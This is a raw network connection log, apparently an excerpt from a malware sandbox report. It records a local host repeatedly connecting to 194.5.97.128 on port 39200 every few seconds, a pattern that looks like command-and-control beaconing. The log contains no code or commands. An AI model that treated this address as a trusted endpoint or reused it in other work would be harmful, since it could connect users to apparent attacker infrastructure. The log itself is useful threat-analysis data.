Aug 3, 2021 19:04:30.383951902 CEST	49831	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:30.435060978 CEST	39200	49831	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:30.944217920 CEST	49831	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:30.989614010 CEST	39200	49831	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:32.034513950 CEST	49832	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:32.080096006 CEST	39200	49832	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:32.584924936 CEST	49832	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:32.630487919 CEST	39200	49832	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:33.131937981 CEST	49832	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:33.177455902 CEST	39200	49832	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:34.234581947 CEST	49833	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:34.280446053 CEST	39200	49833	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:34.788245916 CEST	49833	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:34.834933996 CEST	39200	49833	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:35.351699114 CEST	49833	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:35.405270100 CEST	39200	49833	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:36.465197086 CEST	49834	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:36.529824018 CEST	39200	49834	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:37.038796902 CEST	49834	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:37.084124088 CEST	39200	49834	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:37.585391045 CEST	49834	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:37.630635977 CEST	39200	49834	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:38.688152075 CEST	49835	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:38.734921932 CEST	39200	49835	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:39.243021011 CEST	49835	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:39.290730953 CEST	39200	49835	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:39.804347992 CEST	49835	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:39.850354910 CEST	39200	49835	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:41.022927046 CEST	49836	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:41.073365927 CEST	39200	49836	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:41.585710049 CEST	49836	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:41.631428003 CEST	39200	49836	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:42.133404970 CEST	49836	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:42.181838036 CEST	39200	49836	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:43.239700079 CEST	49837	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:43.286473036 CEST	39200	49837	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:43.789238930 CEST	49837	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:43.835144997 CEST	39200	49837	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:44.338512897 CEST	49837	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:44.384017944 CEST	39200	49837	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:45.439532042 CEST	49838	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:45.485306978 CEST	39200	49838	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:45.995565891 CEST	49838	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:46.045450926 CEST	39200	49838	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:46.554980993 CEST	49838	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:46.602370977 CEST	39200	49838	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:47.668087006 CEST	49839	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:47.717401028 CEST	39200	49839	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:48.226902008 CEST	49839	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:48.272728920 CEST	39200	49839	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:48.776649952 CEST	49839	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:48.829140902 CEST	39200	49839	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:49.882972956 CEST	49840	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:49.931273937 CEST	39200	49840	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:50.445859909 CEST	49840	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:50.496033907 CEST	39200	49840	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:51.008440971 CEST	49840	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:51.054147959 CEST	39200	49840	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:52.112041950 CEST	49841	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:52.157349110 CEST	39200	49841	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:52.664994955 CEST	49841	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:52.714104891 CEST	39200	49841	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:53.227550983 CEST	49841	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:53.273000002 CEST	39200	49841	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:54.324717045 CEST	49842	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:54.370304108 CEST	39200	49842	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:54.883740902 CEST	49842	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:54.929328918 CEST	39200	49842	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:55.431324959 CEST	49842	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:55.486025095 CEST	39200	49842	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:56.614273071 CEST	49843	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:56.659590006 CEST	39200	49843	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:57.165759087 CEST	49843	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:57.212928057 CEST	39200	49843	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:57.728571892 CEST	49843	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:57.775921106 CEST	39200	49843	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:58.833699942 CEST	49844	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:58.886894941 CEST	39200	49844	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:59.402028084 CEST	49844	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:04:59.451914072 CEST	39200	49844	194.5.97.128	192.168.2.3
Aug 3, 2021 19:04:59.962363958 CEST	49844	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:00.009988070 CEST	39200	49844	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:01.054785013 CEST	49845	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:01.107486010 CEST	39200	49845	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:01.618808985 CEST	49845	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:01.666563988 CEST	39200	49845	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:02.184031010 CEST	49845	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:02.231432915 CEST	39200	49845	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:03.280653000 CEST	49846	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:03.328834057 CEST	39200	49846	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:03.838100910 CEST	49846	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:03.889879942 CEST	39200	49846	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:04.400156975 CEST	49846	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:04.446263075 CEST	39200	49846	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:05.507878065 CEST	49847	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:05.554292917 CEST	39200	49847	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:06.058195114 CEST	49847	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:06.104501009 CEST	39200	49847	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:06.619215012 CEST	49847	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:06.666568995 CEST	39200	49847	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:07.732125998 CEST	49848	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:07.777642965 CEST	39200	49848	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:08.291594028 CEST	49848	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:08.337840080 CEST	39200	49848	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:08.863006115 CEST	49848	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:08.909430027 CEST	39200	49848	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:10.225450039 CEST	49849	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:10.270854950 CEST	39200	49849	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:10.791290045 CEST	49849	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:10.929884911 CEST	39200	49849	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:11.432998896 CEST	49849	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:11.478842020 CEST	39200	49849	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:12.750956059 CEST	49850	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:12.796461105 CEST	39200	49850	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:13.307167053 CEST	49850	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:13.353239059 CEST	39200	49850	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:13.870706081 CEST	49850	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:13.916105032 CEST	39200	49850	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:14.959832907 CEST	49851	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:15.007731915 CEST	39200	49851	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:15.510539055 CEST	49851	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:15.555807114 CEST	39200	49851	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:16.058021069 CEST	49851	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:16.103318930 CEST	39200	49851	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:17.146536112 CEST	49852	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:17.191953897 CEST	39200	49852	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:17.698168993 CEST	49852	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:17.743602037 CEST	39200	49852	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:18.247854948 CEST	49852	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:18.294078112 CEST	39200	49852	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:19.366960049 CEST	49853	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:19.412317991 CEST	39200	49853	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:19.917104006 CEST	49853	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:19.962429047 CEST	39200	49853	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:20.464119911 CEST	49853	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:20.509450912 CEST	39200	49853	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:21.554591894 CEST	49854	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:21.600120068 CEST	39200	49854	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:22.104984045 CEST	49854	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:22.152908087 CEST	39200	49854	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:22.667510986 CEST	49854	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:22.713006973 CEST	39200	49854	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:23.758142948 CEST	49855	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:23.803879023 CEST	39200	49855	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:24.308403969 CEST	49855	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:24.357533932 CEST	39200	49855	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:24.870996952 CEST	49855	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:24.916661024 CEST	39200	49855	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:25.961117029 CEST	49856	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:26.011774063 CEST	39200	49856	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:26.511369944 CEST	49856	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:26.556700945 CEST	39200	49856	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:27.058384895 CEST	49856	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:27.104662895 CEST	39200	49856	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:28.193670988 CEST	49857	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:28.239084959 CEST	39200	49857	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:28.746054888 CEST	49857	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:28.791469097 CEST	39200	49857	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:29.292999029 CEST	49857	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:29.338512897 CEST	39200	49857	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:30.385458946 CEST	49858	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:30.430907965 CEST	39200	49858	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:30.933646917 CEST	49858	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:30.979134083 CEST	39200	49858	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:31.480643988 CEST	49858	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:31.526722908 CEST	39200	49858	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:32.575896025 CEST	49859	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:32.621355057 CEST	39200	49859	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:33.121556997 CEST	49859	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:33.167220116 CEST	39200	49859	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:33.668350935 CEST	49859	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:33.713776112 CEST	39200	49859	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:34.745163918 CEST	49860	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:34.790493011 CEST	39200	49860	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:35.293486118 CEST	49860	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:35.340352058 CEST	39200	49860	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:35.856004000 CEST	49860	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:35.909219027 CEST	39200	49860	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:36.962148905 CEST	49861	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:37.008022070 CEST	39200	49861	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:37.512347937 CEST	49861	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:37.557938099 CEST	39200	49861	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:38.059257030 CEST	49861	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:38.106359959 CEST	39200	49861	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:39.167376041 CEST	49862	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:39.212774992 CEST	39200	49862	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:39.715625048 CEST	49862	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:39.762800932 CEST	39200	49862	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:40.262744904 CEST	49862	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:40.308233023 CEST	39200	49862	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:41.343355894 CEST	49863	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:41.388808966 CEST	39200	49863	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:41.903512955 CEST	49863	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:41.949605942 CEST	39200	49863	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:42.450242996 CEST	49863	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:42.495799065 CEST	39200	49863	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:43.583939075 CEST	49864	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:43.629518986 CEST	39200	49864	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:44.138011932 CEST	49864	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:44.183517933 CEST	39200	49864	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:44.687356949 CEST	49864	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:44.732948065 CEST	39200	49864	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:45.788705111 CEST	49865	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:45.834636927 CEST	39200	49865	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:46.341315985 CEST	49865	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:46.387610912 CEST	39200	49865	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:46.888602972 CEST	49865	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:46.934236050 CEST	39200	49865	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:47.977149010 CEST	49866	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:48.022485018 CEST	39200	49866	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:48.528860092 CEST	49866	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:48.574213982 CEST	39200	49866	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:49.076551914 CEST	49866	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:49.121928930 CEST	39200	49866	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:50.162069082 CEST	49867	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:50.207528114 CEST	39200	49867	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:50.716737032 CEST	49867	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:50.764105082 CEST	39200	49867	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:51.279119968 CEST	49867	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:51.325226068 CEST	39200	49867	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:52.359600067 CEST	49868	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:52.405930996 CEST	39200	49868	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:52.919995070 CEST	49868	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:52.965632915 CEST	39200	49868	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:53.466901064 CEST	49868	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:53.512696028 CEST	39200	49868	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:54.569519997 CEST	49869	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:54.615032911 CEST	39200	49869	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:55.123298883 CEST	49869	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:55.168786049 CEST	39200	49869	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:55.670166969 CEST	49869	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:55.716305017 CEST	39200	49869	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:56.757772923 CEST	49870	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:56.803239107 CEST	39200	49870	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:57.311018944 CEST	49870	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:57.356398106 CEST	39200	49870	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:57.857800961 CEST	49870	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:57.904000998 CEST	39200	49870	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:58.991395950 CEST	49871	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:59.037591934 CEST	39200	49871	194.5.97.128	192.168.2.3
Aug 3, 2021 19:05:59.545562029 CEST	49871	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:05:59.591074944 CEST	39200	49871	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:00.092408895 CEST	49871	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:00.138075113 CEST	39200	49871	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:01.182317019 CEST	49872	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:01.228869915 CEST	39200	49872	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:01.733112097 CEST	49872	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:01.778434992 CEST	39200	49872	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:02.280073881 CEST	49872	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:02.325392008 CEST	39200	49872	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:03.366859913 CEST	49873	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:03.413228035 CEST	39200	49873	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:03.920809984 CEST	49873	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:03.968163967 CEST	39200	49873	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:04.483483076 CEST	49873	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:04.530389071 CEST	39200	49873	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:05.586211920 CEST	49874	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:05.631917000 CEST	39200	49874	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:06.139717102 CEST	49874	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:06.185132027 CEST	39200	49874	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:06.686669111 CEST	49874	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:06.732850075 CEST	39200	49874	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:07.776937008 CEST	49875	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:07.822299004 CEST	39200	49875	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:08.328088999 CEST	49875	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:08.374134064 CEST	39200	49875	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:08.874792099 CEST	49875	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:08.921510935 CEST	39200	49875	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:09.970751047 CEST	49876	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:10.016648054 CEST	39200	49876	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:10.530937910 CEST	49876	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:10.579282999 CEST	39200	49876	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:11.093358040 CEST	49876	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:11.139492035 CEST	39200	49876	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:12.182665110 CEST	49877	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:12.228312016 CEST	39200	49877	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:12.734036922 CEST	49877	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:12.779652119 CEST	39200	49877	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:13.280977011 CEST	49877	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:13.326623917 CEST	39200	49877	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:15.238459110 CEST	49878	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:15.284065008 CEST	39200	49878	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:15.791285038 CEST	49878	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:15.837158918 CEST	39200	49878	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:16.343805075 CEST	49878	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:16.389228106 CEST	39200	49878	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:17.438021898 CEST	49879	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:17.483422041 CEST	39200	49879	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:17.984601974 CEST	49879	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:18.030803919 CEST	39200	49879	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:18.531478882 CEST	49879	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:18.577668905 CEST	39200	49879	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:19.621473074 CEST	49880	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:19.668365002 CEST	39200	49880	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:20.172391891 CEST	49880	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:20.217905045 CEST	39200	49880	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:20.719235897 CEST	49880	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:20.765088081 CEST	39200	49880	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:21.809638977 CEST	49881	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:21.854901075 CEST	39200	49881	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:22.360049009 CEST	49881	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:22.405335903 CEST	39200	49881	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:22.907007933 CEST	49881	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:22.952343941 CEST	39200	49881	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:23.993844986 CEST	49882	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:24.039287090 CEST	39200	49882	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:24.548656940 CEST	49882	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:24.594366074 CEST	39200	49882	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:25.110074043 CEST	49882	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:25.155617952 CEST	39200	49882	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:26.204780102 CEST	49883	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:26.250264883 CEST	39200	49883	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:26.751035929 CEST	49883	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:26.804699898 CEST	39200	49883	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:27.313534975 CEST	49883	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:27.359875917 CEST	39200	49883	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:28.402767897 CEST	49884	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:28.448817015 CEST	39200	49884	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:28.954243898 CEST	49884	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:28.999855995 CEST	39200	49884	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:29.501193047 CEST	49884	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:29.547852039 CEST	39200	49884	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:30.627712965 CEST	49885	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:30.673017979 CEST	39200	49885	194.5.97.128	192.168.2.3
Aug 3, 2021 19:06:31.188817978 CEST	49885	39200	192.168.2.3	194.5.97.128
Aug 3, 2021 19:06:31.234237909 CEST	39200	49885	194.5.97.128	192.168.2.3
